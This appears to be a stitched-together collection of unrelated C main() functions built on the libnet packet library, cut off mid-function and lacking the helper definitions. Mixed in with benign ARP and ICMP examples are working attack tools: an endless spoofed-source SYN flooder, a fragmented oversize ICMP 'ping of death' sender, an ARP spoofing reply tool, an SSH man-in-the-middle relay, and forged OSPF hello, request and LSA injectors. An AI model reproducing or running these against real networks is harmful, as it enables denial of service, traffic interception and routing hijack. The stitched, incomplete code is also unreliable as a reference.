int
main(int argc, char **argv)
{
int sock, warn, len;
u_char *pack, *to, *from, *neighbor;
u_long src, dst, addaid, addrid, nbr, auth[2];
if (argc != 4)
help(argv[0]);
from = argv[1];
to = argv[2];
neighbor = argv[3];
len = LIBNET_OSPF_H + LIBNET_HELLO_H + LIBNET_IP_H + LIBNET_AUTH_H;
pack = (u_char *)malloc(len);
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
free(pack);
exit(-1);
}
src = libnet_name_resolve(from, 0);
dst = libnet_name_resolve(to, 0);
nbr = libnet_name_resolve(neighbor, 0);
addrid = 0x23696969;
addaid = 0xc0ffee00; /* GENERIC : FAKE : ETC */
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_HELLO_H, 0x00,
101, IP_DF, 254, IPPROTO_OSPF, src, dst, NULL, 0, pack);
auth[0] = 0;
auth[1] = 0;
libnet_build_ospf(LIBNET_HELLO_H + LIBNET_AUTH_H, LIBNET_OSPF_HELLO,
addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
LIBNET_IP_H);
LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);
libnet_build_ospf_hello(0xffffffff, 2, 0x00, 0x00, 30, src, src, nbr,
NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
warn = libnet_write_ip(sock, pack, len);
if (warn != len) {
printf("Error sending: %d bytes written : %s\n", warn, strerror(errno));
free(pack);
exit(warn);
} else {
printf("%d bytes written\n", warn);
}
free(pack);
return (0);
}
int
main(int argc, char **argv)
{
int warn, sock, len;
u_char *pack;
char *from, *to, *adrtr;
u_long src, dest, advrouter, addaid, addrid;
u_char auth[2];
if (argc != 4)
help(argv[0]);
from = argv[1];
to = argv[2];
adrtr = argv[3];
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
exit(-1);
}
src = libnet_name_resolve(from, 0);
dest = libnet_name_resolve(to, 0);
advrouter = libnet_name_resolve(adrtr, 0);
addaid = 0xc0ffeeb0;
addrid = 0xb00f00d0;
len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H;
pack = (u_char *)malloc(len);
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H, 0x00,
(u_short)rand(), IP_DF, 0xff, IPPROTO_OSPF, src, dest, NULL,
0, pack);
memset(auth, 0, sizeof(auth));
libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSR_H, LIBNET_OSPF_LSR,
addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
LIBNET_IP_H);
LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);
libnet_build_ospf_lsr(LIBNET_LS_TYPE_RTR, 0xffffffff, advrouter, NULL, 0,
pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
warn = libnet_write_ip(sock, pack, len);
if (warn == -1) {
printf("Error writing packet to wire\n");
free(pack);
} else {
printf("%d bytes written\n", warn);
}
free(pack);
return (0);
}
int
main(int argc, char *argv[])
{
int c;
u_long src_ip, dst_ip;
char errbuf[256];
char *device = NULL;
struct libnet_link_int *l;
printf("link layer ICMP packet building/writing test\n");
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "i:d:s:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 'i':
device = optarg;
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !device)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
if ((l = libnet_open_link_interface(device, errbuf)) == NULL)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
c = send_icmp(l, device, src_ip, dst_ip);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main(int argc,char *argv[])
{
char a;
int sock,r;
u_long src;
u_long dst;
char pktbuf[IP_MAXPACKET];
char payload[]="ABCDEFGHIJKLMNOPRST";
u_char options[4];
struct ipoption ipopt;
bzero(options,OPT_LEN);
while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
{
switch(a) {
case 'h' : { usage(); exit(1); }
case 's' : { src=libnet_name_resolve(optarg,0); break;}
case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
}
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock<0)
{
perror("socket");
exit(1);
}
libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
memcpy(ipopt.ipopt_list, options, OPT_LEN);
*(ipopt.ipopt_list) = 0xe4;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
if (r <0)
{
libnet_close_raw_sock(sock);
printf("Error ip options insertion failed\n");
exit(1);
}
r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
if (r<0)
{
libnet_close_raw_sock(sock);
printf("Error write_ip \n");
exit(1);
}
libnet_close_raw_sock(sock);
return 0;
}
int main (int argc, char **argv)
{
unsigned long fakesrc, target;
unsigned char *buf;
unsigned char *data;
int sock, i, flags, offset, len;
if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(1);
}
if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("raw sock");
exit(1);
}
/* get random src addr. */
libnet_seed_prand();
fakesrc = libnet_get_prand(LIBNET_PRu32);
buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H);
data = (unsigned char *)malloc(FRAG_LEN);
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else len = 410; /* for total reconstructed len of 65538 */
/* make IP header. */
libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666,
flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target,
NULL, 0, buf);
/* make ICMP packet. */
libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H);
/* calculate ICMP checksum. */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len);
/* send it. */
libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len);
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0),
argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : "");
}
free(buf);
return (EXIT_SUCCESS);
}
int main(int argc, char **argv)
{
struct libnet_link_int *intf;
int nconnect;
struct timeval tv;
unsigned char spa[4], tpa[4];
unsigned char sha[ETH_ALEN], tha[ETH_ALEN];
unsigned long tmpip;
gettimeofday(&tv, NULL);
srand(tv.tv_sec ^ tv.tv_usec ^ (getpid()<<15));
if(argc < 3)
{
printf("usage: %s <spa> <sha> <tpa> <tha>\n", argv[0]);
exit(1);
}
if((intf = libnet_open_link_interface(INTERFACE, NULL)) == NULL)
{
perror("open intf");
exit(1);
}
tmpip = libnet_name_resolve(argv[1], 0);
memcpy(spa, &tmpip, 4);
tmpip = libnet_name_resolve(argv[3], 0);
memcpy(tpa, &tmpip, 4);
memcpy(sha, hex2eth(argv[2]), ETH_ALEN);
memcpy(tha, hex2eth(argv[4]), ETH_ALEN);
arp_spoof_reply(intf, spa, sha, tpa, tha);
}
int main(int argc, char **argv)
{
struct link_int *intf;
int nconnect;
char *dev = DEFAULT_DEV;
struct timeval tv;
struct eth_pair src, dst;
gettimeofday(&tv, NULL);
srand(tv.tv_sec ^ tv.tv_usec ^ (getpid()<<15));
if(argc < 6)
{
printf("usage: %s <IP broadcast> <IP netmask> <gw ip> <gw hw> <nconnects>\n", argv[0]);
exit(1);
}
nconnect = atoi(argv[3]);
if((intf = libnet_open_link_interface(dev, NULL)) == NULL)
{
perror("open intf");
exit(1);
}
netmask = libnet_name_resolve(argv[2], 0);
broadcast = libnet_name_resolve(argv[1], 0);
//fill_port_table(intf, dev, broadcast, netmask, nconnect);
src.ip = rand();
memcpy(src.eth, &src.ip, 4);
src.ip = libnet_name_resolve("130.126.44.109", 0);
memcpy(dst.eth, hex2eth(argv[4]), ETH_ALEN);
dst.ip = libnet_name_resolve(argv[3], 0);
write_icmpether(intf, dev, &dst, &src);
}
int
main(int argc, char *argv[])
{
int c;
u_long ip;
u_short lport, rport;
lport = rport = 22;
while ((c = getopt(argc, argv, "dIp:h?V")) != -1) {
switch (c) {
case 'd':
Opt_debug = 1;
break;
case 'I':
Opt_interact = 1;
break;
case 'p':
if ((lport = atoi(optarg)) == 0)
usage();
break;
default:
usage();
break;
}
}
argc -= optind;
argv += optind;
if (argc < 1)
usage();
if ((ip = libnet_name_resolve(argv[0], 1)) == -1)
usage();
if (argc == 2 && (rport = atoi(argv[1])) == 0)
usage();
record_init(NULL);
mitm_init(lport, ip, rport);
warnx("relaying to %s", argv[0]);
mitm_run();
exit(0);
}
int
main(int argc, char *argv[])
{
int i, c;
char errbuf[256];
char *device = NULL;
struct libnet_link_int *l;
struct ether_addr e;
u_long ip;
while ((c = getopt(argc, argv, "i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
if (!device)
{
fprintf(stderr, "Specify a device\n");
exit(EXIT_FAILURE);
}
if (argc > optind)
{
if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
{
fprintf(stderr, "Cannot resolve IP address\n");
exit(EXIT_FAILURE);
}
}
else
{
fprintf(stderr, "IP address to ARP for?\n");
exit(EXIT_FAILURE);
}
l = libnet_open_link_interface(device, errbuf);
if (!l)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
c = libnet_do_arp(l, device, &e, ip);
if (c != -1)
{
for (i = 0; i < 6; i++)
{
printf("%x", e.ether_addr_octet[i]);
if (i != 5)
{
printf(":");
}
}
printf("\n");
}
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
int c, amount;
char errbuf[256];
char *device = NULL;
struct link_int *l;
u_long ip;
amount = 20;
while ((c = getopt(argc, argv, "n:i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
case 'n':
amount = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!device)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
if (argc <= optind)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
{
fprintf(stderr, "Cannot resolve IP address\n");
exit(EXIT_FAILURE);
}
l = libnet_open_link_interface(device, errbuf);
if (!l)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
while (amount--)
{
c = send_arp(l, ip, device);
if (c == -1)
{
/* bail on the first error */
break;
}
}
printf("\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
int c = -1;
char errbuf[LIBNET_ERRBUF_SIZE];
char* device;
char* ipaddr;
char* macaddr;
char* broadcast;
char* netmask;
u_int32_t ip;
u_char src_mac[6];
LTYPE* l;
int repeatcount = 1;
int j;
long msinterval = 1000;
int flag;
char pidfilenamebuf[64];
char *pidfilename = NULL;
CL_SIGNAL(SIGTERM, byebye);
CL_SIGINTERRUPT(SIGTERM, 1);
cl_log_set_entity(SENDARPNAME);
cl_log_enable_stderr(TRUE);
cl_log_set_facility(LOG_USER);
cl_inherit_logging_environment(0);
while ((flag = getopt(argc, argv, "i:r:p:")) != EOF) {
switch(flag) {
case 'i': msinterval= atol(optarg);
break;
case 'r': repeatcount= atoi(optarg);
break;
case 'p': pidfilename= optarg;
break;
default: fprintf(stderr, "%s\n\n", print_usage);
return 1;
break;
}
}
if (argc-optind != 5) {
fprintf(stderr, "%s\n\n", print_usage);
return 1;
}
/*
* argv[optind+1] DEVICE dc0,eth0:0,hme0:0,
* argv[optind+2] IP 192.168.195.186
* argv[optind+3] MAC ADDR 00a0cc34a878
* argv[optind+4] BROADCAST 192.168.195.186
* argv[optind+5] NETMASK ffffffffffff
*/
device = argv[optind];
ipaddr = argv[optind+1];
macaddr = argv[optind+2];
broadcast = argv[optind+3];
netmask = argv[optind+4];
if (!pidfilename) {
if (snprintf(pidfilenamebuf, sizeof(pidfilenamebuf), "%s%s",
PIDFILE_BASE, ipaddr) >=
(int)sizeof(pidfilenamebuf)) {
cl_log(LOG_INFO, "Pid file truncated");
return EXIT_FAILURE;
}
pidfilename = pidfilenamebuf;
}
if(write_pid_file(pidfilename) < 0) {
return EXIT_FAILURE;
}
#if defined(HAVE_LIBNET_1_0_API)
#ifdef ON_DARWIN
if ((ip = libnet_name_resolve((unsigned char*)ipaddr, 1)) == -1UL) {
#else
if ((ip = libnet_name_resolve(ipaddr, 1)) == -1UL) {
#endif
cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
unlink(pidfilename);
return EXIT_FAILURE;
}
l = libnet_open_link_interface(device, errbuf);
if (!l) {
cl_log(LOG_ERR, "libnet_open_link_interface on %s: %s"
, device, errbuf);
unlink(pidfilename);
return EXIT_FAILURE;
}
#elif defined(HAVE_LIBNET_1_1_API)
if ((l=libnet_init(LIBNET_LINK, device, errbuf)) == NULL) {
cl_log(LOG_ERR, "libnet_init failure on %s: %s", device, errbuf);
unlink(pidfilename);
return EXIT_FAILURE;
}
if ((signed)(ip = libnet_name2addr4(l, ipaddr, 1)) == -1) {
cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
unlink(pidfilename);
return EXIT_FAILURE;
}
#else
# error "Must have LIBNET API version defined."
#endif
if (!strcasecmp(macaddr, AUTO_MAC_ADDR)) {
if (get_hw_addr(device, src_mac) < 0) {
cl_log(LOG_ERR, "Cannot find mac address for %s",
device);
unlink(pidfilename);
return EXIT_FAILURE;
}
}
else {
convert_macaddr((unsigned char *)macaddr, src_mac);
}
/*
* We need to send both a broadcast ARP request as well as the ARP response we
* were already sending. All the interesting research work for this fix was
* done by Masaki Hasegawa <*****@*****.**> and his colleagues.
*/
for (j=0; j < repeatcount; ++j) {
c = send_arp(l, ip, (unsigned char*)device, src_mac
, (unsigned char*)broadcast, (unsigned char*)netmask
, ARPOP_REQUEST);
if (c < 0) {
break;
}
mssleep(msinterval / 2);
c = send_arp(l, ip, (unsigned char*)device, src_mac
, (unsigned char *)broadcast
, (unsigned char *)netmask, ARPOP_REPLY);
if (c < 0) {
break;
}
if (j != repeatcount-1) {
mssleep(msinterval / 2);
}
}
unlink(pidfilename);
return c < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}
void
convert_macaddr (u_char *macaddr, u_char enet_src[6])
{
int i, pos;
u_char bits[3];
pos = 0;
for (i = 0; i < 6; i++) {
/* Inserted to allow old-style MAC addresses */
if (*macaddr == ':') {
pos++;
}
bits[0] = macaddr[pos++];
bits[1] = macaddr[pos++];
bits[2] = '\0';
enet_src[i] = strtol((const char *)bits, (char **)NULL, 16);
}
}
int
main(int argc, char **argv)
{
int sock, warn, len;
u_char *pack;
char *from, *to;
u_long src, dst, addrid, addaid, auth[2];
if (argc != 3)
help(argv[0]);
len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
LIBNET_LS_NET_LEN;
pack = (u_char *)malloc(len);
from = argv[1];
to = argv[2];
src = libnet_name_resolve(from, 0);
dst = libnet_name_resolve(to, 0);
addrid = 0xff00ff00;
addaid = 0xd00dd00d;
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
free(pack);
exit(sock);
}
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
LIBNET_LS_NET_LEN,
0x00,
(u_short)rand(),
IP_DF,
0xfe,
IPPROTO_OSPF,
src,
dst,
NULL,
0,
pack);
libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN,
LIBNET_OSPF_LSA,
addrid,
addaid,
LIBNET_OSPF_AUTH_NULL,
NULL,
0,
pack + LIBNET_IP_H);
memset(auth, 0, sizeof(auth));
LIBNET_OSPF_AUTHCPY(pack + LIBNET_OSPF_H + LIBNET_IP_H, auth);
libnet_build_ospf_lsa(40,
0x00,
LIBNET_LS_TYPE_NET,
addrid,
src,
0xf0f0f00f,
LIBNET_LS_NET_LEN,
NULL,
0,
pack + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H);
libnet_build_ospf_lsa_net(0xffffff00,
0xc0ffee00,
NULL,
0,
pack + LIBNET_LSA_H + LIBNET_AUTH_H +
LIBNET_OSPF_H + LIBNET_IP_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
libnet_do_checksum(pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H,
IPPROTO_OSPF_LSA, LIBNET_LS_NET_LEN + LIBNET_LSA_H);
warn = libnet_write_ip(sock, pack, len);
if (warn == -1) {
printf("Error writing packet to the wire\n");
free(pack);
exit(warn);
}
printf("%d bytes written\n", warn);
free(pack);
return (0);
}
int
main(int argc, char *argv[])
{
int packet_size, /* size of our packet */
payload_size, /* size of our packet */
c; /* misc */
u_long src_ip, dst_ip; /* source ip, dest ip */
u_short bport, eport; /* beginning and end ports */
u_short cport; /* current port */
u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */
u_char *packet; /* pointer to our packet buffer */
char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */
u_char *device; /* pointer to the device to use */
struct libnet_link_int *network; /* pointer to link interface struct */
struct libnet_plist_chain plist; /* plist chain */
struct libnet_plist_chain *plist_p; /* plist chain pointer */
printf("libnet example code:\tmodule 4\n\n");
printf("packet injection interface:\tlink layer\n");
printf("packet type:\t\t\tUDP [with payload] using port list chaining\n");
plist_p = NULL;
device = NULL;
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad destination IP address: %s\n", optarg);
}
break;
case 'i':
device = optarg;
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad source IP address: %s\n", optarg);
}
break;
case 'p':
plist_p = &plist;
if (libnet_plist_chain_new(&plist_p, optarg) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n");
}
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
c = argc - optind;
if (c != 1)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
memset(payload, 0, sizeof(payload));
strncpy(payload, argv[optind], strlen(argv[optind]));
/*
* Step 1: Network Initialization (interchangable with step 2).
*/
if (device == NULL)
{
struct sockaddr_in sin;
/*
* Try to locate a device.
*/
if (libnet_select_device(&sin, &device, err_buf) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf);
}
printf("device:\t\t\t\t%s\n", device);
}
if ((network = libnet_open_link_interface(device, err_buf)) == NULL)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf);
}
/*
* Get the payload from the user. Hrm. This might fail on a Sparc
* if byte alignment is off...
*/
payload_size = strlen(payload);
/*
* We're going to build a UDP packet with a payload using the
* link-layer API, so this time we need memory for a ethernet header
* as well as memory for the ICMP and IP headers and our payload.
*/
packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size;
/*
* Step 2: Memory Initialization (interchangable with step 1).
*/
if (libnet_init_packet(packet_size, &packet) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
}
/*
* Step 3: Packet construction (ethernet header).
*/
libnet_build_ethernet(enet_dst,
enet_src,
ETHERTYPE_IP,
NULL,
0,
packet);
/*
* Step 3: Packet construction (IP header).
*/
libnet_build_ip(LIBNET_UDP_H + payload_size,
0, /* IP tos */
242, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_UDP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
packet + LIBNET_ETH_H); /* Packet header memory */
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
/*
* Step 3: Packet construction (UDP header).
*/
libnet_build_udp(242, /* source port */
cport, /* dest. port */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_ETH_H + LIBNET_IP_H);
/*
* Step 4: Packet checksums (ICMP header *AND* IP header).
*/
if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
/*
* Step 5: Packet injection.
*/
c = libnet_write_link_layer(network, device, packet, packet_size);
if (c < packet_size)
{
libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
}
else
{
printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport);
}
}
}
/*
* Shut down the interface.
*/
if (libnet_close_link_interface(network) == -1)
{
libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
}
/*
* Free packet memory.
*/
libnet_destroy_packet(&packet);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
int sock, n, c, r, p_num;
struct libnet_arena arena, *arena_p;
u_char *packets[10];
u_char *payload;
u_char *buf;
u_long src_ip, dst_ip;
src_ip = 0;
dst_ip = 0;
payload = NULL;
while((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, 1))) {
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, 1))) {
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(-1);
}
break;
case 'p':
payload = optarg;
break;
default:
usage();
exit(-1);
}
}
if (!src_ip || !dst_ip || !payload) {
usage();
exit(-1);
}
/* allocate packet memory */
buf = (u_char *)malloc(LIBNET_IP_H + LIBNET_ICMP_H + strlen(payload));
if(!buf) {
perror("malloc:");
exit(-1);
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("No socket");
exit(-1);
}
/* build headers */
libnet_build_ip(LIBNET_ICMP_ECHO_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT,
TPING_ID, 0, TPING_TTL, IPPROTO_ICMP, src_ip, dst_ip, NULL, 0, buf);
libnet_build_icmp_echo(ICMP_ECHO, 0, TPING_ID, 1, payload,strlen(payload),
buf + LIBNET_IP_H);
if (libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) < 0) {
fprintf(stderr, "Can't do checksum!\n");
}
/*
* Write the packet to the network.
*/
r = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload));
if (r < LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)) {
fprintf(stderr, "Unable to send packet.\n");
}
printf("ICMP Echo sent. Payload: %s\n",payload);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // allocate memory for packet
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
packet); // packet header memory
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // urgent pointer
NULL, // payload (none)
0, // payload length
packet + LIBNET_IP_H); // packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy_packet(&packet); // free packet memory
if (libnet_close_raw_sock(network) == -1) // close the network interface
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int main(int argc, char *argv[])
{
// packet type (arp/udp/tcp)
char type[5];
// network device
char *device = "eth0\0";
struct libnet_link_int *link;
// Raw socket
int sock;
// error buffer
char errbuff[LIBNET_ERRBUF_SIZE];
// src and dst mac
u_char dmac[6],smac[6];
// src and dst ip
unsigned int src_ip, dst_ip;
// packet buffer
unsigned char *packet;
// packet payload
char *payload;
// payload size
int p_size;
// bytes send over the wire
int send;
// check parameter
if(argc == 1)
{
printf("Usage: %s <arp/udp/tcp>\n",argv[0]);
exit(0);
}
else
{
strcpy(type,argv[1]);
}
// Allocate memory for the payload
payload = malloc(50);
// Packets payload
strcpy(payload,"TEST LIBNET\0");
packet = NULL;
// payload size
p_size = strlen(payload);
// mac address
strcpy(smac,SMAC);
strcpy(dmac,DMAC);
// ip address in network byte order
src_ip = inet_addr(SOURCE);
dst_ip = inet_addr(DEST);
// Lookup ip addresses
src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0);
dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0);
// Build an ARP packet?
if(!strcmp(type,"arp"))
{
// open the network device
link = libnet_open_link_interface(device,errbuff);
// Failed?
if(link == NULL)
{
printf("Error while opening device %s!\n%s\n",device,errbuff);
exit(1);
}
printf("Using device %s\n",device);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
if(packet == NULL)
{
printf("libnet_init_packet error!\n");
exit(1);
}
// Build ethernet header
libnet_build_ethernet(dmac, // destination mac
smac, // source mac
ETHERTYPE_ARP,// ethernet packet type
NULL, // pointer to payload
0, // payload size
packet // pointer to packet buffer
);
printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST);
libnet_build_arp(ARPHRD_ETHER, // hardware type
ETHERTYPE_IP, // protocol type
ETHER_ADDR_LEN, // hardware address size
4, // protocol address size
ARPOP_REPLY, // ARP operation
smac, // source mac
(u_char *)&src_ip, // source ip
dmac, // destination mac
(u_char *)&dst_ip, // destination ip
NULL, // pointer to payload
0, // payload size
packet+LIBNET_ETH_H // pointer to packet buffer
);
// Get the packet on the wire
send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the network device
libnet_close_link_interface(link);
}
else
{
// Open a raw sock
sock = libnet_open_raw_sock(IPPROTO_RAW);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
// Build ip header
libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length
0, // ip type of service
242, // ip id
0, // fragmentation bit
48, // time to live
IPPROTO_TCP, // Transport Control Protokoll
src_ip, // source ip
dst_ip, // destination ip
NULL, // pointer to ip payload
